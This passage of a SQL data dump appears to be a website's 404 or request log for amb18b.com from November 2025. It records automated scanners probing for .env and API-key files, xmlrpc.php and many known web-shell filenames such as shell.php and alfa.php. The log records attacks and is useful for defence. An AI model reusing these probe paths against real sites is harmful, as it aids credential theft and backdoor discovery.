05:36:44'),(9883,'https://amb18b.com/attaining.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:45','2025-11-24 05:36:45'),(9884,'https://amb18b.com/bunnies.php?p=','172.192.40.201','Direct Access',1,'2025-11-24 05:36:46','2025-11-24 05:36:46'),(9885,'https://amb18b.com/frenchwomen.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:48','2025-11-24 05:36:48'),(9886,'https://amb18b.com/glucosidase.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:49','2025-11-24 05:36:49'),(9887,'https://amb18b.com/modernize.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:50','2025-11-24 05:36:50'),(9888,'https://amb18b.com/twohandedness.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:51','2025-11-24 05:36:51'),(9889,'https://amb18b.com/undigitated.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:52','2025-11-24 05:36:52'),(9890,'https://amb18b.com/unsafer.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:53','2025-11-24 05:36:53'),(9891,'https://amb18b.com/abc.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:54','2025-11-24 05:36:54'),(9892,'https://amb18b.com/unbalanceable.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:55','2025-11-24 05:36:55'),(9893,'https://amb18b.com/wp-advaced.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:56','2025-11-24 05:36:56'),(9894,'https://amb18b.com/wp-securitiy.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:58','2025-11-24 05:36:58'),(9895,'https://amb18b.com/poliomyelopathy.php','172.192.40.201','Direct Access',1,'2025-11-24 05:36:59','2025-11-24 05:36:59'),(9896,'https://amb18b.com/xmlrpc.php','106.213.87.162','Direct Access',1,'2025-11-24 06:09:41','2025-11-24 06:09:41'),(9897,'https://amb18b.com/media/system/js/core.js','34.31.152.239','Direct Access',1,'2025-11-24 08:35:38','2025-11-24 08:35:38'),(9898,'https://amb18b.com/.env','78.153.140.171','Direct Access',1,'2025-11-24 09:11:03','2025-11-24 09:11:03'),(9899,'https://amb18b.com/.env','78.153.140.171','Direct Access',1,'2025-11-24 09:11:03','2025-11-24 09:11:03'),(9900,'https://amb18b.com/sendgrid.env','78.153.140.171','Direct Access',1,'2025-11-24 09:11:05','2025-11-24 09:11:05'),(9901,'https://amb18b.com/twilio.env','78.153.140.171','Direct Access',1,'2025-11-24 09:11:06','2025-11-24 09:11:06'),(9902,'https://amb18b.com/sendgrid.env','78.153.140.171','Direct Access',1,'2025-11-24 09:11:06','2025-11-24 09:11:06'),(9903,'https://amb18b.com/twilio.env','78.153.140.171','Direct Access',1,'2025-11-24 09:11:07','2025-11-24 09:11:07'),(9904,'https://amb18b.com/xmrlpc.php','195.186.201.200','https://www.google.co.uk/',1,'2025-11-24 09:42:37','2025-11-24 09:42:37'),(9905,'https://amb18b.com/abcd.php','119.30.172.120','https://www.google.de/',1,'2025-11-24 09:42:41','2025-11-24 09:42:41'),(9906,'https://amb18b.com/admin.php','62.213.219.204','https://www.google.co.uk/',1,'2025-11-24 09:42:43','2025-11-24 09:42:43'),(9907,'https://amb18b.com/info.php','221.1.122.170','https://www.yahoo.com/',1,'2025-11-24 09:42:45','2025-11-24 09:42:45'),(9908,'https://amb18b.com/edit.php','227.194.45.34','https://www.google.com/',1,'2025-11-24 09:42:46','2025-11-24 09:42:46'),(9909,'https://amb18b.com/moon.php','107.109.189.243','https://www.bing.com/',1,'2025-11-24 09:42:48','2025-11-24 09:42:48'),(9910,'https://amb18b.com/classwithtostring.php','254.62.53.43','https://www.yahoo.com/',1,'2025-11-24 09:42:50','2025-11-24 09:42:50'),(9911,'https://amb18b.com/file4.php','235.132.255.7','https://www.google.co.uk/',1,'2025-11-24 09:42:52','2025-11-24 09:42:52'),(9912,'https://amb18b.com/ioxi-o.php','39.53.46.31','https://www.bing.com/',1,'2025-11-24 09:42:54','2025-11-24 09:42:54'),(9913,'https://amb18b.com/wp-good.php','43.133.53.16','https://www.yahoo.com/',1,'2025-11-24 09:42:56','2025-11-24 09:42:56'),(9914,'https://amb18b.com/ds.php','122.248.236.53','https://www.yahoo.com/',1,'2025-11-24 09:42:58','2025-11-24 09:42:58'),(9915,'https://amb18b.com/bolt.php','113.65.195.95','https://www.google.co.uk/',1,'2025-11-24 09:43:00','2025-11-24 09:43:00'),(9916,'https://amb18b.com/new.php','10.36.65.128','https://www.yahoo.com/',1,'2025-11-24 09:43:02','2025-11-24 09:43:02'),(9917,'https://amb18b.com/wp-includes/js/','166.144.57.159','https://www.google.fr/',1,'2025-11-24 09:43:03','2025-11-24 09:43:03'),(9918,'https://amb18b.com/wp-includes/pomo/','89.43.134.121','https://duckduckgo.com/',1,'2025-11-24 09:43:05','2025-11-24 09:43:05'),(9919,'https://amb18b.com/wp-includes/rest-api/','45.180.191.56','https://www.google.fr/',1,'2025-11-24 09:43:07','2025-11-24 09:43:07'),(9920,'https://amb18b.com/wp-includes/widgets/','147.230.115.101','https://duckduckgo.com/',1,'2025-11-24 09:43:09','2025-11-24 09:43:09'),(9921,'https://amb18b.com/wp-admin/css/','226.167.111.228','https://www.google.co.uk/',1,'2025-11-24 09:43:11','2025-11-24 09:43:11'),(9922,'https://amb18b.com/wp-admin/images/','109.129.142.193','https://www.google.co.uk/',1,'2025-11-24 09:43:13','2025-11-24 09:43:13'),(9923,'https://amb18b.com/wp-admin/maint/','251.84.142.31','https://www.bing.com/',1,'2025-11-24 09:43:15','2025-11-24 09:43:15'),(9924,'https://amb18b.com/wp-admin/meta/','211.196.186.161','https://duckduckgo.com/',1,'2025-11-24 09:43:18','2025-11-24 09:43:18'),(9925,'https://amb18b.com/wp-admin/includes/','239.31.99.71','https://www.yahoo.com/',1,'2025-11-24 09:43:25','2025-11-24 09:43:25'),(9926,'https://amb18b.com/wp-includes/','121.231.140.94','https://www.google.de/',1,'2025-11-24 09:43:32','2025-11-24 09:43:32'),(9927,'https://amb18b.com/wp-includes/css/','180.220.200.190','https://www.google.co.uk/',1,'2025-11-24 09:43:34','2025-11-24 09:43:34'),(9928,'https://amb18b.com/wp-includes/ID3/','62.173.87.250','https://www.google.de/',1,'2025-11-24 09:43:36','2025-11-24 09:43:36'),(9929,'https://amb18b.com/wp-includes/IXR/','32.243.30.61','https://www.google.fr/',1,'2025-11-24 09:43:38','2025-11-24 09:43:38'),(9930,'https://amb18b.com/wp-includes/Requests/','95.27.199.90','https://www.google.de/',1,'2025-11-24 09:43:40','2025-11-24 09:43:40'),(9931,'https://amb18b.com/wp-includes/SimplePie/','77.11.20.236','https://www.google.fr/',1,'2025-11-24 09:43:42','2025-11-24 09:43:42'),(9932,'https://amb18b.com/wp-includes/Text/','224.222.173.16','https://www.google.de/',1,'2025-11-24 09:43:44','2025-11-24 09:43:44'),(9933,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','199.123.215.109','https://duckduckgo.com/',1,'2025-11-24 09:43:53','2025-11-24 09:43:53'),(9934,'https://amb18b.com/wp-includes/certificates/','124.154.186.251','https://duckduckgo.com/',1,'2025-11-24 09:43:55','2025-11-24 09:43:55'),(9935,'https://amb18b.com/wp-includes/customize/','28.150.203.232','https://duckduckgo.com/',1,'2025-11-24 09:43:57','2025-11-24 09:43:57'),(9936,'https://amb18b.com/wp-includes/fonts/','10.155.168.30','https://duckduckgo.com/',1,'2025-11-24 09:43:59','2025-11-24 09:43:59'),(9937,'https://amb18b.com/wp-includes/images/','223.134.190.139','https://www.bing.com/',1,'2025-11-24 09:44:01','2025-11-24 09:44:01'),(9938,'https://amb18b.com/.well-known/','124.224.233.168','https://www.yahoo.com/',1,'2025-11-24 09:44:02','2025-11-24 09:44:02'),(9939,'https://amb18b.com/ALFA_DATA/','58.245.28.224','https://www.bing.com/',1,'2025-11-24 09:44:04','2025-11-24 09:44:04'),(9940,'https://amb18b.com/.well-knownold/','171.12.107.252','https://www.google.co.uk/',1,'2025-11-24 09:44:06','2025-11-24 09:44:06'),(9941,'https://amb18b.com/.well-known/acme-challenge/','197.93.167.58','https://www.google.com/',1,'2025-11-24 09:44:08','2025-11-24 09:44:08'),(9942,'https://amb18b.com/cgi-bin/','18.59.195.23','https://www.google.fr/',1,'2025-11-24 09:44:10','2025-11-24 09:44:10'),(9943,'https://amb18b.com/uploads/','210.35.201.33','https://www.google.com/',1,'2025-11-24 09:44:12','2025-11-24 09:44:12'),(9944,'https://amb18b.com/upload/','57.63.197.61','https://www.yahoo.com/',1,'2025-11-24 09:44:14','2025-11-24 09:44:14'),(9945,'https://amb18b.com/admin/uploads/','153.174.18.150','https://www.google.co.uk/',1,'2025-11-24 09:44:16','2025-11-24 09:44:16'),(9946,'https://amb18b.com/Admin/uploads/','58.219.23.253','https://duckduckgo.com/',1,'2025-11-24 09:44:18','2025-11-24 09:44:18'),(9947,'https://amb18b.com/admin/','30.216.123.175','https://www.google.com/',1,'2025-11-24 09:44:20','2025-11-24 09:44:20'),(9948,'https://amb18b.com/images/','75.193.165.55','https://www.google.de/',1,'2025-11-24 09:44:22','2025-11-24 09:44:22'),(9949,'https://amb18b.com/assets/','162.205.249.77','https://duckduckgo.com/',1,'2025-11-24 09:44:27','2025-11-24 09:44:27'),(9950,'https://amb18b.com/vendor/phpunit/phpunit/src/Util/PHP/','44.107.245.77','https://www.google.de/',1,'2025-11-24 09:44:28','2025-11-24 09:44:28'),(9951,'https://amb18b.com/upload/image/','229.111.116.126','https://duckduckgo.com/',1,'2025-11-24 09:44:31','2025-11-24 09:44:31'),(9952,'https://amb18b.com/assets/images/','105.182.178.255','https://duckduckgo.com/',1,'2025-11-24 09:44:32','2025-11-24 09:44:32'),(9953,'https://amb18b.com/Public/','198.250.239.55','https://www.google.co.uk/',1,'2025-11-24 09:44:34','2025-11-24 09:44:34'),(9954,'https://amb18b.com/vendor/','194.14.195.187','https://www.google.fr/',1,'2025-11-24 09:44:36','2025-11-24 09:44:36'),(9955,'https://amb18b.com/local/','25.123.240.81','https://www.google.de/',1,'2025-11-24 09:44:38','2025-11-24 09:44:38'),(9956,'https://amb18b.com/modules/','130.76.245.139','https://www.bing.com/',1,'2025-11-24 09:44:41','2025-11-24 09:44:41'),(9957,'https://amb18b.com/Site/','11.26.81.86','https://www.google.de/',1,'2025-11-24 09:44:43','2025-11-24 09:44:43'),(9958,'https://amb18b.com/system/','221.240.86.76','https://www.yahoo.com/',1,'2025-11-24 09:44:45','2025-11-24 09:44:45'),(9959,'https://amb18b.com/template/','223.82.169.171','https://duckduckgo.com/',1,'2025-11-24 09:44:47','2025-11-24 09:44:47'),(9960,'https://amb18b.com/shop/','159.100.111.184','https://www.yahoo.com/',1,'2025-11-24 09:44:49','2025-11-24 09:44:49'),(9961,'https://amb18b.com/files/','194.177.156.78','https://www.google.de/',1,'2025-11-24 09:44:52','2025-11-24 09:44:52'),(9962,'https://amb18b.com/admin/editor/','76.9.244.237','https://www.bing.com/',1,'2025-11-24 09:44:54','2025-11-24 09:44:54'),(9963,'https://amb18b.com/include/','106.125.180.230','https://www.google.fr/',1,'2025-11-24 09:44:56','2025-11-24 09:44:56'),(9964,'https://amb18b.com/Assets/','131.77.241.232','https://www.google.fr/',1,'2025-11-24 09:44:58','2025-11-24 09:44:58'),(9965,'https://amb18b.com/images/stories/','87.137.202.67','https://www.bing.com/',1,'2025-11-24 09:45:00','2025-11-24 09:45:00'),(9966,'https://amb18b.com/plugins/','160.226.105.178','https://www.bing.com/',1,'2025-11-24 09:45:02','2025-11-24 09:45:02'),(9967,'https://amb18b.com/php/','67.111.58.17','https://www.google.co.uk/',1,'2025-11-24 09:45:05','2025-11-24 09:45:05'),(9968,'https://amb18b.com/wp-includes/assets/','81.86.143.166','https://www.google.fr/',1,'2025-11-24 09:45:07','2025-11-24 09:45:07'),(9969,'https://amb18b.com/wp-includes/Text/Diff/Engine/','116.176.25.91','https://www.google.com/',1,'2025-11-24 09:45:09','2025-11-24 09:45:09'),(9970,'https://amb18b.com/wp-includes/block-patterns/','18.27.155.189','https://www.google.co.uk/',1,'2025-11-24 09:45:11','2025-11-24 09:45:11'),(9971,'https://amb18b.com/wp-includes/Text/Diff/','235.11.163.0','https://www.google.com/',1,'2025-11-24 09:45:13','2025-11-24 09:45:13'),(9972,'https://amb18b.com/wp-includes/block-supports/','138.69.114.90','https://www.google.fr/',1,'2025-11-24 09:45:15','2025-11-24 09:45:15'),(9973,'https://amb18b.com/wp-includes/SimplePie/Cache/','101.131.132.208','https://duckduckgo.com/',1,'2025-11-24 09:45:17','2025-11-24 09:45:17'),(9974,'https://amb18b.com/wp-includes/SimplePie/Content/Type/','198.20.247.198','https://www.google.fr/',1,'2025-11-24 09:45:19','2025-11-24 09:45:19'),(9975,'https://amb18b.com/wp-includes/SimplePie/Content/','85.197.25.5','https://www.google.com/',1,'2025-11-24 09:45:22','2025-11-24 09:45:22'),(9976,'https://amb18b.com/wp-includes/rest-api/endpoints/','138.145.231.105','https://www.yahoo.com/',1,'2025-11-24 09:45:23','2025-11-24 09:45:23'),(9977,'https://amb18b.com/wp-includes/rest-api/fields/','183.247.255.19','https://www.google.fr/',1,'2025-11-24 09:45:25','2025-11-24 09:45:25'),(9978,'https://amb18b.com/wp-includes/Requests/Cookie/','9.177.233.170','https://www.yahoo.com/',1,'2025-11-24 09:45:27','2025-11-24 09:45:27'),(9979,'https://amb18b.com/wp-includes/Requests/Proxy/','147.65.192.185','https://www.yahoo.com/',1,'2025-11-24 09:45:29','2025-11-24 09:45:29'),(9980,'https://amb18b.com/wp-includes/Requests/Response/','126.231.71.56','https://www.bing.com/',1,'2025-11-24 09:45:31','2025-11-24 09:45:31'),(9981,'https://amb18b.com/wp-includes/Requests/Transport/','86.41.216.142','https://www.google.de/',1,'2025-11-24 09:45:33','2025-11-24 09:45:33'),(9982,'https://amb18b.com/wp-includes/Requests/Utility/','213.227.209.165','https://www.yahoo.com/',1,'2025-11-24 09:45:35','2025-11-24 09:45:35'),(9983,'https://amb18b.com/wp-includes/js/codemirror/','120.72.235.158','https://www.google.co.uk/',1,'2025-11-24 09:45:37','2025-11-24 09:45:37'),(9984,'https://amb18b.com/wp-includes/Requests/Exception/HTTP/','20.4.190.147','https://www.google.com/',1,'2025-11-24 09:45:38','2025-11-24 09:45:38'),(9985,'https://amb18b.com/wp-includes/js/crop/','95.100.41.18','https://www.google.com/',1,'2025-11-24 09:45:40','2025-11-24 09:45:40'),(9986,'https://amb18b.com/wp-includes/images/crystal/','205.61.50.139','https://www.yahoo.com/',1,'2025-11-24 09:45:42','2025-11-24 09:45:42'),(9987,'https://amb18b.com/wp-includes/images/media/','139.73.84.34','https://www.google.fr/',1,'2025-11-24 09:45:45','2025-11-24 09:45:45'),(9988,'https://amb18b.com/wp-includes/images/smilies/','238.178.87.89','https://duckduckgo.com/',1,'2025-11-24 09:45:46','2025-11-24 09:45:46'),(9989,'https://amb18b.com/wp-includes/images/wlw/','49.130.0.100','https://www.google.co.uk/',1,'2025-11-24 09:45:48','2025-11-24 09:45:48'),(9990,'https://amb18b.com/wp-includes/rest-api/search/','253.246.2.134','https://www.google.fr/',1,'2025-11-24 09:45:50','2025-11-24 09:45:50'),(9991,'https://amb18b.com/wp-includes/Requests/Exception/','88.161.181.124','https://duckduckgo.com/',1,'2025-11-24 09:45:52','2025-11-24 09:45:52'),(9992,'https://amb18b.com/wp-includes/Requests/Auth/','27.84.37.122','https://duckduckgo.com/',1,'2025-11-24 09:45:55','2025-11-24 09:45:55'),(9993,'https://amb18b.com/wp-includes/sodium_compat/src/','198.184.231.215','https://www.google.fr/',1,'2025-11-24 09:45:57','2025-11-24 09:45:57'),(9994,'https://amb18b.com/wp-includes/sitemaps/providers/','157.197.44.4','https://duckduckgo.com/',1,'2025-11-24 09:45:59','2025-11-24 09:45:59'),(9995,'https://amb18b.com/wp-includes/Text/Diff/Engine/Engine/','110.59.226.74','https://www.google.fr/',1,'2025-11-24 09:46:02','2025-11-24 09:46:02'),(9996,'https://amb18b.com/wp-includes/html-api/','235.249.71.75','https://www.google.fr/',1,'2025-11-24 09:46:04','2025-11-24 09:46:04'),(9997,'https://amb18b.com/wp-includes/php-compat/','146.110.10.17','https://www.google.de/',1,'2025-11-24 09:46:06','2025-11-24 09:46:06'),(9998,'https://amb18b.com/wp-includes/PHPMailer/','244.238.164.79','https://www.bing.com/',1,'2025-11-24 09:46:08','2025-11-24 09:46:08'),(9999,'https://amb18b.com/wp-includes/random_compat/','30.23.129.70','https://duckduckgo.com/',1,'2025-11-24 09:46:10','2025-11-24 09:46:10'),(10000,'https://amb18b.com/wp-includes/sitemaps/','155.83.117.109','https://www.google.fr/',1,'2025-11-24 09:46:11','2025-11-24 09:46:11'),(10001,'https://amb18b.com/wp-includes/sodium_compat/','184.58.131.17','https://duckduckgo.com/',1,'2025-11-24 09:46:14','2025-11-24 09:46:14'),(10002,'https://amb18b.com/wp-includes/style-engine/','218.197.37.235','https://www.bing.com/',1,'2025-11-24 09:46:16','2025-11-24 09:46:16'),(10003,'https://amb18b.com/wp-includes/theme-compat/','234.47.159.20','https://www.google.fr/',1,'2025-11-24 09:46:18','2025-11-24 09:46:18'),(10004,'https://amb18b.com/wp-admin/css/colors/ectoplasm/','67.17.25.9','https://www.google.com/',1,'2025-11-24 09:46:20','2025-11-24 09:46:20'),(10005,'https://amb18b.com/wp-admin/css/colors/','151.209.126.242','https://duckduckgo.com/',1,'2025-11-24 09:46:21','2025-11-24 09:46:21'),(10006,'https://amb18b.com/admin/images/slider/','19.3.252.32','https://www.google.fr/',1,'2025-11-24 09:46:24','2025-11-24 09:46:24'),(10007,'https://amb18b.com/admin/fckeditor/editor/filemanager/','75.106.131.200','https://duckduckgo.com/',1,'2025-11-24 09:46:34','2025-11-24 09:46:34'),(10008,'https://amb18b.com/sites/default/files/','106.110.112.143','https://www.google.co.uk/',1,'2025-11-24 09:46:38','2025-11-24 09:46:38'),(10009,'https://amb18b.com/admin/controller/extension/extension/','43.96.245.167','https://www.yahoo.com/',1,'2025-11-24 09:46:40','2025-11-24 09:46:40'),(10010,'https://amb18b.com//xmlrpc.php?rsd','152.42.211.111','Direct Access',1,'2025-11-24 09:46:41','2025-11-24 09:46:41'),(10011,'https://amb18b.com//blog/robots.txt','152.42.211.111','Direct Access',1,'2025-11-24 09:46:41','2025-11-24 09:46:41'),(10012,'https://amb18b.com//blog/','152.42.211.111','Direct Access',1,'2025-11-24 09:46:42','2025-11-24 09:46:42'),(10013,'https://amb18b.com//wordpress/','152.42.211.111','Direct Access',1,'2025-11-24 09:46:42','2025-11-24 09:46:42'),(10014,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/','162.236.121.246','https://www.google.de/',1,'2025-11-24 09:46:42','2025-11-24 09:46:42'),(10015,'https://amb18b.com//wp/','152.42.211.111','Direct Access',1,'2025-11-24 09:46:43','2025-11-24 09:46:43'),(10016,'https://amb18b.com/components/','74.169.175.186','https://duckduckgo.com/',1,'2025-11-24 09:46:45','2025-11-24 09:46:45'),(10017,'https://amb18b.com/admin/uploads/images/','103.134.166.21','https://www.yahoo.com/',1,'2025-11-24 09:46:46','2025-11-24 09:46:46'),(10018,'https://amb18b.com/sitemap.xml','106.75.16.45','Direct Access',1,'2025-11-24 10:27:14','2025-11-24 10:27:14'),(10019,'https://amb18b.com/sitemap.xml','106.75.50.6','Direct Access',1,'2025-11-24 10:27:39','2025-11-24 10:27:39'),(10020,'https://amb18b.com/xmlrpc.php','128.199.163.66','https://amb18b.com',1,'2025-11-24 11:33:00','2025-11-24 11:33:00'),(10021,'https://amb18b.com/sitemap.xml','161.97.143.134','Direct Access',1,'2025-11-24 11:34:25','2025-11-24 11:34:25'),(10022,'https://amb18b.com/wp-sitemap.xml','161.97.143.134','Direct Access',1,'2025-11-24 11:34:30','2025-11-24 11:34:30'),(10023,'https://amb18b.com/wp-sitemap-users-1.xml','161.97.143.134','Direct Access',1,'2025-11-24 11:34:35','2025-11-24 11:34:35'),(10024,'https://amb18b.com/author-sitemap.xml','161.97.143.134','Direct Access',1,'2025-11-24 11:35:01','2025-11-24 11:35:01'),(10025,'https://amb18b.com/xmlrpc.php','182.253.58.139','https://amb18b.com',1,'2025-11-24 11:35:59','2025-11-24 11:35:59'),(10026,'https://amb18b.com/Wp-JsOn/Wp/V2/UsErS','201.46.112.136','Direct Access',1,'2025-11-24 11:37:16','2025-11-24 11:37:16'),(10027,'https://amb18b.com/graphql','103.124.95.251','Direct Access',1,'2025-11-24 11:38:11','2025-11-24 11:38:11'),(10028,'https://amb18b.com/xmlrpc.php','103.77.207.75','https://amb18b.com',1,'2025-11-24 11:40:06','2025-11-24 11:40:06'),(10029,'https://amb18b.com/neshe','52.138.205.19','Direct Access',1,'2025-11-24 11:42:46','2025-11-24 11:42:46'),(10030,'https://amb18b.com/siln.php','52.138.205.19','Direct Access',1,'2025-11-24 11:42:48','2025-11-24 11:42:48'),(10031,'https://amb18b.com/xpow0b.php','52.138.205.19','Direct Access',1,'2025-11-24 11:42:50','2025-11-24 11:42:50'),(10032,'https://amb18b.com/xpobv.php','52.138.205.19','Direct Access',1,'2025-11-24 11:42:51','2025-11-24 11:42:51'),(10033,'https://amb18b.com/xmlrpc.php','52.138.205.19','Direct Access',1,'2025-11-24 11:42:53','2025-11-24 11:42:53'),(10034,'https://amb18b.com/xmailer.php','52.138.205.19','Direct Access',1,'2025-11-24 11:42:55','2025-11-24 11:42:55'),(10035,'https://amb18b.com/wp-signup.php','52.138.205.19','Direct Access',1,'2025-11-24 11:42:57','2025-11-24 11:42:57'),(10036,'https://amb18b.com/testo.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:01','2025-11-24 11:43:01'),(10037,'https://amb18b.com/test.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:03','2025-11-24 11:43:03'),(10038,'https://amb18b.com/t.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:04','2025-11-24 11:43:04'),(10039,'https://amb18b.com/style.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:06','2025-11-24 11:43:06'),(10040,'https://amb18b.com/shell.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:08','2025-11-24 11:43:08'),(10041,'https://amb18b.com/saxzw9t.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:10','2025-11-24 11:43:10'),(10042,'https://amb18b.com/saxzgf5.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:11','2025-11-24 11:43:11'),(10043,'https://amb18b.com/s.php','52.138.205.19','Direct Access',2,'2025-11-24 11:44:38','2025-11-24 11:43:14'),(10044,'https://amb18b.com/psh.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:15','2025-11-24 11:43:15'),(10045,'https://amb18b.com/revision.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:17','2025-11-24 11:43:17'),(10046,'https://amb18b.com/product.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:19','2025-11-24 11:43:19'),(10047,'https://amb18b.com/klwc.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:21','2025-11-24 11:43:21'),(10048,'https://amb18b.com/klbnm.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:22','2025-11-24 11:43:22'),(10049,'https://amb18b.com/bkxzo.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:24','2025-11-24 11:43:24'),(10050,'https://amb18b.com/simple.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:26','2025-11-24 11:43:26'),(10051,'https://amb18b.com/d12.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:27','2025-11-24 11:43:27'),(10052,'https://amb18b.com/ad.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:29','2025-11-24 11:43:29'),(10053,'https://amb18b.com/0x.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:31','2025-11-24 11:43:31'),(10054,'https://amb18b.com/admin.php?p=','52.138.205.19','Direct Access',1,'2025-11-24 11:43:32','2025-11-24 11:43:32'),(10055,'https://amb18b.com/admin.php','52.138.205.19','Direct Access',2,'2025-11-24 11:43:44','2025-11-24 11:43:34'),(10056,'https://amb18b.com/chosen.php?p=','52.138.205.19','Direct Access',1,'2025-11-24 11:43:36','2025-11-24 11:43:36'),(10057,'https://amb18b.com/up.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:38','2025-11-24 11:43:38'),(10058,'https://amb18b.com/ioxi-o.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:39','2025-11-24 11:43:39'),(10059,'https://amb18b.com/gm.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:41','2025-11-24 11:43:41'),(10060,'https://amb18b.com/error.php','52.138.205.19','Direct Access',2,'2025-11-24 11:44:13','2025-11-24 11:43:43'),(10061,'https://amb18b.com/log.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:46','2025-11-24 11:43:46'),(10062,'https://amb18b.com/new2.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:48','2025-11-24 11:43:48'),(10063,'https://amb18b.com/alfa.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:50','2025-11-24 11:43:50'),(10064,'https://amb18b.com/wsd.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:52','2025-11-24 11:43:52'),(10065,'https://amb18b.com/abcd.php','52.138.205.19','Direct Access',2,'2025-11-24 11:44:12','2025-11-24 11:43:53'),(10066,'https://amb18b.com/image.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:55','2025-11-24 11:43:55'),(10067,'https://amb18b.com/indo.php/qa.php','52.138.205.19','Direct Access',1,'2025-11-24 11:43:57','2025-11-24 11:43:57'),(10068,'https://amb18b.com/chosen.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:00','2025-11-24 11:44:00'),(10069,'https://amb18b.com/well-known/acme-challenge/index.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:02','2025-11-24 11:44:02'),(10070,'https://amb18b.com/wxo.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:04','2025-11-24 11:44:04'),(10071,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','52.138.205.19','Direct Access',1,'2025-11-24 11:44:05','2025-11-24 11:44:05'),(10072,'https://amb18b.com/wp-includes/fonts/index.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:07','2025-11-24 11:44:07'),(10073,'https://amb18b.com/wp-includes/images/wp-login.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:08','2025-11-24 11:44:08'),(10074,'https://amb18b.com/02.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:10','2025-11-24 11:44:10'),(10075,'https://amb18b.com/xmlrpc.php','192.241.128.246','https://amb18b.com',1,'2025-11-24 11:44:13','2025-11-24 11:44:13'),(10076,'https://amb18b.com/yy.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:15','2025-11-24 11:44:15'),(10077,'https://amb18b.com/well-known/index.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:17','2025-11-24 11:44:17'),(10078,'https://amb18b.com/well-known/acme-challenge/LA.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:18','2025-11-24 11:44:18'),(10079,'https://amb18b.com/6.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:20','2025-11-24 11:44:20'),(10080,'https://amb18b.com/class.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:22','2025-11-24 11:44:22'),(10081,'https://amb18b.com/mail.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:23','2025-11-24 11:44:23'),(10082,'https://amb18b.com/lv.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:25','2025-11-24 11:44:25'),(10083,'https://amb18b.com/zwso.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:27','2025-11-24 11:44:27'),(10084,'https://amb18b.com/filemanager/dialog.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:28','2025-11-24 11:44:28'),(10085,'https://amb18b.com/r.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:30','2025-11-24 11:44:30'),(10086,'https://amb18b.com/admin/function.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:32','2025-11-24 11:44:32'),(10087,'https://amb18b.com/js/fm.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:33','2025-11-24 11:44:33'),(10088,'https://amb18b.com/buy.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:36','2025-11-24 11:44:36'),(10089,'https://amb18b.com/akcc.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:39','2025-11-24 11:44:39'),(10090,'https://amb18b.com/qing.php','52.138.205.19','Direct Access',1,'2025-11-24 11:44:41','2025-11-24 11:44:41'),(10091,'https://amb18b.com/w.php?p=','52.138.205.19','Direct Access',1,'2025-11-24 11:44:43','2025-11-24 11:44:43'),(10092,'https://amb18b.com/xmlrpc.php','209.42.19.68','https://amb18b.com',1,'2025-11-24 11:48:31','2025-11-24 11:48:31'),(10093,'https://amb18b.com/xmlrpc.php','103.110.84.40','https://amb18b.com',2,'2025-11-24 12:05:24','2025-11-24 11:56:55'),(10094,'https://amb18b.com/xmlrpc.php','213.156.43.111','https://amb18b.com',1,'2025-11-24 12:09:35','2025-11-24 12:09:35'),(10095,'https://amb18b.com/xmlrpc.php','103.218.122.203','https://amb18b.com',1,'2025-11-24 12:13:45','2025-11-24 12:13:45'),(10096,'https://amb18b.com/xmlrpc.php','165.227.13.11','https://amb18b.com',1,'2025-11-24 12:18:03','2025-11-24 12:18:03'),(10097,'https://amb18b.com/xmlrpc.php','167.172.113.201','https://amb18b.com',1,'2025-11-24 12:22:18','2025-11-24 12:22:18'),(10098,'https://amb18b.com/xmlrpc.php','165.22.5.123','https://amb18b.com',1,'2025-11-24 12:26:30','2025-11-24 